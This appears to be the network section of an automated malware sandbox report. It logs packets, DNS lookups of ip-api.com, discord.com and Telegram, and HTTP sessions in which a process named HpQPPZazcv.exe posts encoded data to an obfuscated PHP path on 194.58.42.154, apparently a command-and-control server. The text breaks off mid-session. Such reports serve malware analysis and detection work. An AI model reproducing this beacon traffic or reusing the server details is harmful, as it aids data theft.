                                                                  Aug 1, 2024 04:28:57.304689884 CEST8049780194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:57.417978048 CEST4978180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:57.425759077 CEST8049781194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:57.425848007 CEST4978180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:57.426158905 CEST4978180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:57.431152105 CEST8049781194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:57.643682957 CEST4978080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:57.649025917 CEST8049780194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:57.649064064 CEST8049780194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:57.784280062 CEST4978180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:57.794128895 CEST8049781194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:57.794159889 CEST8049781194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:57.794187069 CEST8049781194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:58.092801094 CEST8049780194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:58.225663900 CEST8049781194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:58.227440119 CEST8049780194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:58.227819920 CEST4978080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:58.364523888 CEST8049781194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:58.364845991 CEST4978180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:58.486648083 CEST4978180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:58.486767054 CEST4978080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:58.487217903 CEST4978280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:58.491960049 CEST8049781194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:58.492058039 CEST8049782194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:58.492225885 CEST4978180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:58.492227077 CEST4978280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:58.492227077 CEST4978280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:58.492243052 CEST8049780194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:58.492300034 CEST4978080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:58.497360945 CEST8049782194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:58.846752882 CEST4978280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:58.852150917 CEST8049782194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:58.852181911 CEST8049782194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:58.852207899 CEST8049782194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:59.289421082 CEST8049782194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:59.423705101 CEST8049782194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:59.423892021 CEST4978280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:00.080924034 CEST4978280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:00.082242966 CEST4978380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:00.086554050 CEST8049782194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:00.086769104 CEST4978280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:00.087205887 CEST8049783194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:00.087276936 CEST4978380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:00.088128090 CEST4978380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:00.093127012 CEST8049783194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:00.440613031 CEST4978380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:00.445900917 CEST8049783194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:00.446052074 CEST8049783194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:00.446177959 CEST8049783194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:00.898355961 CEST8049783194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:01.127870083 CEST4978380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:01.241123915 CEST8049783194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:01.241213083 CEST8049783194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:01.241292000 CEST4978380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:01.485472918 CEST4978380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:01.491493940 CEST8049783194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:01.491575956 CEST4978380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:01.523329973 CEST4978480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:01.528567076 CEST8049784194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:01.528800964 CEST4978480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:01.528892040 CEST4978480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:01.536907911 CEST8049784194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:01.878110886 CEST4978480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:01.887779951 CEST8049784194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:01.887816906 CEST8049784194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:01.887845993 CEST8049784194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:02.326628923 CEST8049784194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:02.455996037 CEST8049784194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:02.457207918 CEST4978480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:03.903134108 CEST4978580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:03.908230066 CEST8049785194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:03.908443928 CEST4978580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:03.908575058 CEST4978580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:03.913575888 CEST8049785194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:03.935353041 CEST4978680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:03.940579891 CEST8049786194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:03.940821886 CEST4978680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:03.942960978 CEST4978680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:03.947978020 CEST8049786194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:04.252912998 CEST4978580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:04.258407116 CEST8049785194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:04.258891106 CEST8049785194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:04.300242901 CEST4978680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:04.305392027 CEST8049786194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:04.307224989 CEST8049786194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:04.307236910 CEST8049786194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:04.701478004 CEST8049785194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:04.723057032 CEST8049786194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:04.815331936 CEST4978580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:04.815331936 CEST4978680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:04.831768990 CEST8049785194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:04.850946903 CEST8049786194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:04.924582005 CEST4978580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:04.927171946 CEST4978680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:04.968050003 CEST4978480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:04.968142986 CEST4978580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:04.968142986 CEST4978680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:04.968641996 CEST4978780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:04.973740101 CEST8049784194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:04.973778009 CEST8049787194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:04.973922968 CEST4978480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:04.973923922 CEST4978780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:04.974018097 CEST4978780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:04.974083900 CEST8049785194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:04.974112034 CEST8049786194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:04.974267960 CEST4978580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:04.974267960 CEST4978680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:04.978884935 CEST8049787194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:05.331149101 CEST4978780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:05.336680889 CEST8049787194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:05.336698055 CEST8049787194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:05.336710930 CEST8049787194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:05.793731928 CEST8049787194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:05.956015110 CEST4978780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:05.977181911 CEST8049787194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:06.143496990 CEST4978780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:06.184015036 CEST4978780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:06.184381008 CEST4978880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:06.189795971 CEST8049787194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:06.189819098 CEST8049788194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:06.190007925 CEST4978780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:06.190057993 CEST4978880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:06.190058947 CEST4978880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:06.195214033 CEST8049788194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:06.978975058 CEST8049788194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:07.127782106 CEST4978880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:16.986957073 CEST8049788194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:16.986974955 CEST8049788194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:16.987083912 CEST4978880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:23.456589937 CEST4978880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:23.458270073 CEST4978880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:29:23.461864948 CEST8049788194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:23.462398052 CEST8049788194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:23.462429047 CEST8049788194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:29:23.463176966 CEST8049788194.58.42.154192.168.2.4
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Aug 1, 2024 04:28:05.790946007 CEST5307253192.168.2.41.1.1.1
                                                                  Aug 1, 2024 04:28:05.798007965 CEST53530721.1.1.1192.168.2.4
                                                                  Aug 1, 2024 04:28:08.356617928 CEST5580353192.168.2.41.1.1.1
                                                                  Aug 1, 2024 04:28:08.363800049 CEST53558031.1.1.1192.168.2.4
                                                                  Aug 1, 2024 04:28:09.809014082 CEST5661753192.168.2.41.1.1.1
                                                                  Aug 1, 2024 04:28:09.816160917 CEST53566171.1.1.1192.168.2.4
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Aug 1, 2024 04:28:05.790946007 CEST192.168.2.41.1.1.10x8697Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                  Aug 1, 2024 04:28:08.356617928 CEST192.168.2.41.1.1.10x829fStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                  Aug 1, 2024 04:28:09.809014082 CEST192.168.2.41.1.1.10x7a68Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Aug 1, 2024 04:28:05.798007965 CEST1.1.1.1192.168.2.40x8697No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                  Aug 1, 2024 04:28:08.363800049 CEST1.1.1.1192.168.2.40x829fNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                  Aug 1, 2024 04:28:08.363800049 CEST1.1.1.1192.168.2.40x829fNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                  Aug 1, 2024 04:28:08.363800049 CEST1.1.1.1192.168.2.40x829fNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                  Aug 1, 2024 04:28:08.363800049 CEST1.1.1.1192.168.2.40x829fNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                  Aug 1, 2024 04:28:08.363800049 CEST1.1.1.1192.168.2.40x829fNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                  Aug 1, 2024 04:28:09.816160917 CEST1.1.1.1192.168.2.40x7a68No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                  • discord.com
                                                                  • api.telegram.org
                                                                  • 194.58.42.154
                                                                  • ip-api.com
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449739194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:27:45.026078939 CEST501OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:27:45.406383038 CEST344OUTData Raw: 00 06 04 00 06 09 01 00 05 06 02 01 02 02 01 05 00 03 05 0b 02 04 03 0b 03 02 0e 05 04 53 00 05 0f 0f 04 01 07 02 03 05 0e 0a 06 03 06 06 04 06 04 07 0e 5b 0c 01 06 07 05 02 04 00 05 52 05 58 02 04 0f 0e 04 00 06 54 0c 00 0f 04 0e 03 0c 06 02 01
                                                                  Data Ascii: S[RXTTUP\L~N|`a_wqmLwvlR~]cRs^plKxod^x`Ph}``^o_je~V@{SvL}r}
                                                                  Aug 1, 2024 04:27:45.473998070 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:27:45.504803896 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:27:46.032799959 CEST1236INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:27:45 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Vary: Accept-Encoding
                                                                  Content-Length: 1412
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 56 4a 7d 5d 7a 7d 5a 59 78 62 52 49 7c 07 7c 5a 7d 64 7f 40 68 59 79 41 6d 5d 52 4f 7e 72 6f 59 63 73 7d 42 79 72 7a 5e 75 58 7c 02 6a 5b 78 01 55 4b 72 55 74 4c 63 06 7f 71 66 5e 7f 5e 75 54 78 75 6c 0c 7e 63 73 00 77 61 71 02 77 4f 5b 03 7f 58 7e 48 7e 7c 60 0a 7d 74 64 59 76 76 7b 06 7c 5c 71 03 6a 5e 5b 44 79 67 55 5e 78 49 55 5f 6c 54 64 59 7a 5c 5e 00 7a 70 79 5b 7c 4e 70 01 7b 67 6f 5b 6a 5b 6c 5a 77 62 64 48 7a 51 41 5b 7f 74 74 40 7c 5f 76 54 62 7c 5a 06 7b 6f 64 4b 76 60 6e 08 7a 61 75 4a 7d 7c 5f 5f 7b 61 61 59 75 70 7b 44 75 4f 7c 04 60 58 66 50 7e 5d 7a 06 63 5c 6d 4f 76 66 7f 50 7e 6c 66 58 77 6f 70 04 7e 60 7c 03 78 6f 6f 03 7b 5e 66 01 7c 6e 73 51 77 5e 7c 03 7e 62 5c 09 7e 54 67 0a 7b 54 79 5b 6a 62 71 06 7b 5d 46 51 7f 7f 6c 0a 7e 60 64 0a 7d 49 7e 01 78 43 59 49 79 72 52 03 6b 58 67 01 69 74 7c 54 7f 4e 53 0b 7a 05 68 06 69 5c 64 4b 60 63 53 51 7b 5c 79 07 76 76 56 48 7d 48 5a 4e 7f 76 5b 08 76 72 67 4a 7d 62 75 07 7f 49 62 0c 7b 66 60 08 7c 63 77 02 75 72 6d 4f 77 5f 75 00 7f 4f [TRUNCATED]
                                                                  Data Ascii: VJ}]z}ZYxbRI||Z}d@hYyAm]RO~roYcs}Byrz^uX|j[xUKrUtLcqf^^uTxul~cswaqwO[X~H~|`}tdYvv{|\qj^[DygU^xIU_lTdYz\^zpy[|Np{go[j[lZwbdHzQA[tt@|_vTb|Z{odKv`nzauJ}|__{aaYup{DuO|`XfP~]zc\mOvfP~lfXwop~`|xoo{^f|nsQw^|~b\~Tg{Ty[jbq{]FQl~`d}I~xCYIyrRkXgit|TNSzhi\dK`cSQ{\yvvVH}HZNv[vrgJ}buIb{f`|cwurmOw_uOP~lt~ggJvakJxLuJ~^SxIhNywt{mYy\tIxcb^^{Y^~bswap||U|wZ_qNuR`Lz|pw^nAya}I}RjLxafvM{Iwq^Owa\@`vvb_LuK^RqwB^M|sxx|w{`PI}}xtYR}Lf@}mc{}PL}ripR@||@~^x}gvN{}sD{r`~ac}gw@|NyyM`~blt]eB{aquXd|vhN~HaOtrsI|Lu|wTAxHh@}]{v\awqmJ|abF~|VwYDwqgGxbqI}NiJ{IpNxwlxCUzbVzcTL{]NZlYRKj\svX{]~|wkgR|bRbo`L{lc\v`uRzO_H}RX_z\y\}b`g{ZL~Jx^~w\uaelBTXtB^h`w_{|lYoY}[T|Aww^Oj\TzSYQVq[QqBQsKP~{QiETWtqQ~Z]oa]`X^]QtPkqzPWomQaZ[TBem~Z_\ie[S_~[{Z~uzYhg~lup}skGbav]tXmqv~ol~t{wqx\{avZiwqSJsZldBTqd_VaWVZaNVcoIRp|z\QBvqlE~lH~Y|B{\CPbo@VIc[Llz@WpX_z\y~boUTobOXL~JxYW[[zF\f]HSTLco]ESZyQ|}olPTen@XJpEy[STQtKQnS
                                                                  Aug 1, 2024 04:27:46.033272982 CEST405INData Raw: 46 52 5a 09 4e 68 63 55 48 50 0a 0c 7d 52 06 63 54 7a 59 58 5d 61 55 59 5a 7a 75 7b 5f 6b 62 0b 44 51 7b 60 56 50 63 05 5e 57 5a 6f 5b 51 61 0c 44 6d 5a 76 4c 6e 66 79 05 71 59 04 5e 57 4b 73 6d 52 01 72 4a 70 5f 45 5a 68 04 66 43 51 74 4b 08 6c
                                                                  Data Ascii: FRZNhcUHP}RcTzYX]aUYZzu{_kbDQ{`VPc^WZo[QaDmZvLnfyqY^WKsmRrJp_EZhfCQtKlUMk|F\aZ[TtSa]yRZPfeZtvx^oaGQ|n]WdRoTW`HRcYW`b_}]seT^YiagPmgXW`H{ZFQhbO[Ao]DayOV[f@QUeCQp}GbpcZw\yhf~JxYW[[zF\f]HST_[P`_TVd}lc_{SVPm^
                                                                  Aug 1, 2024 04:27:49.604711056 CEST477OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 384
                                                                  Expect: 100-continue
                                                                  Aug 1, 2024 04:27:49.874025106 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:27:49.876854897 CEST384OUTData Raw: 58 54 59 51 5f 4a 57 59 5e 5a 5a 56 50 5d 50 5c 55 57 5c 51 54 5d 5a 59 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: XTYQ_JWY^ZZVP]P\UW\QT]ZYYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&(#&#Z8_*9>)!+\?;<%=-W7#(*9X $8_3=9^/.]+/
                                                                  Aug 1, 2024 04:27:50.151701927 CEST324INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:27:49 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Vary: Accept-Encoding
                                                                  Content-Length: 152
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 0e 1e 26 10 23 35 31 11 23 2e 2f 0c 3a 5c 29 05 28 1d 39 04 2a 3c 3b 02 27 0d 09 1e 2b 13 0a 59 3d 2c 23 01 24 2d 2c 50 34 5a 3d 57 3c 26 2a 46 0c 10 26 02 3e 2d 09 51 26 59 37 57 2e 56 32 1a 31 07 2b 59 35 3f 00 16 34 28 30 1b 3c 2b 3c 54 33 07 0d 0b 2f 2e 0f 01 31 51 3d 02 23 35 2a 54 02 15 27 53 3e 04 29 12 30 32 20 5c 32 3f 24 0e 25 07 31 58 35 3c 29 10 37 29 26 17 24 16 2c 0a 3c 2e 02 56 24 2f 28 13 29 1f 35 56 21 2d 20 50 2a 01 2c 57 00 35 57 54
                                                                  Data Ascii: &#51#./:\)(9*<;'+Y=,#$-,P4Z=W<&*F&>-Q&Y7W.V21+Y5?4(0<+<T3/.1Q=#5*T'S>)02 \2?$%1X5<)7)&$,<.V$/()5V!- P*,W5WT
                                                                  Aug 1, 2024 04:27:52.245501041 CEST478OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Aug 1, 2024 04:27:52.513803005 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:27:52.514266968 CEST2512OUTData Raw: 58 5e 5c 55 5f 45 52 5e 5e 5a 5a 56 50 58 50 5a 55 54 5c 5b 54 5b 5a 50 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: X^\U_ER^^ZZVPXPZUT\[T[ZPYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&( 5R#$_*0==25; +'9#X,(\6#'3=9^/.]+;
                                                                  Aug 1, 2024 04:27:52.798106909 CEST151INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:27:52 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.449740194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:27:49.867995977 CEST477OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 384
                                                                  Expect: 100-continue
                                                                  Aug 1, 2024 04:27:50.682379961 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:27:50.868844032 CEST384OUTData Raw: 58 54 5c 56 5f 47 57 5a 5e 5a 5a 56 50 59 50 5e 55 56 5c 5c 54 5b 5a 5d 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: XT\V_GWZ^ZZVPYP^UV\\T[Z]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%?)#?;*32[)<%!(;]?8$$>6#0V<9%^74?39^/.]+
                                                                  Aug 1, 2024 04:27:51.156352043 CEST324INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:27:50 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Vary: Accept-Encoding
                                                                  Content-Length: 152
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 0e 1e 26 53 22 18 21 5a 20 3e 02 1f 2e 03 32 58 2b 0a 29 03 3e 3c 02 13 24 30 20 0f 3f 3d 3f 01 3e 3f 3c 5c 25 2e 02 57 23 2f 3d 12 3c 26 2a 46 0c 10 26 06 28 3d 27 13 26 2f 23 1c 2c 20 03 0b 25 00 1a 07 22 59 2a 1b 37 38 2c 59 3e 3b 20 50 24 17 23 0e 39 00 07 05 32 27 3e 5d 34 25 2a 54 02 15 24 08 29 5b 36 00 24 32 12 5f 25 3c 19 10 32 10 39 5e 20 2c 04 04 20 17 04 5b 27 06 2b 1b 29 2d 38 19 26 59 34 5a 2a 32 26 0b 21 17 20 50 2a 01 2c 57 00 35 57 54
                                                                  Data Ascii: &S"!Z >.2X+)><$0 ?=?>?<\%.W#/=<&*F&(='&/#, %"Y*78,Y>; P$#92'>]4%*T$)[6$2_%<29^ , ['+)-8&Y4Z*2&! P*,W5WT


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.449741194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:27:53.042762995 CEST478OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
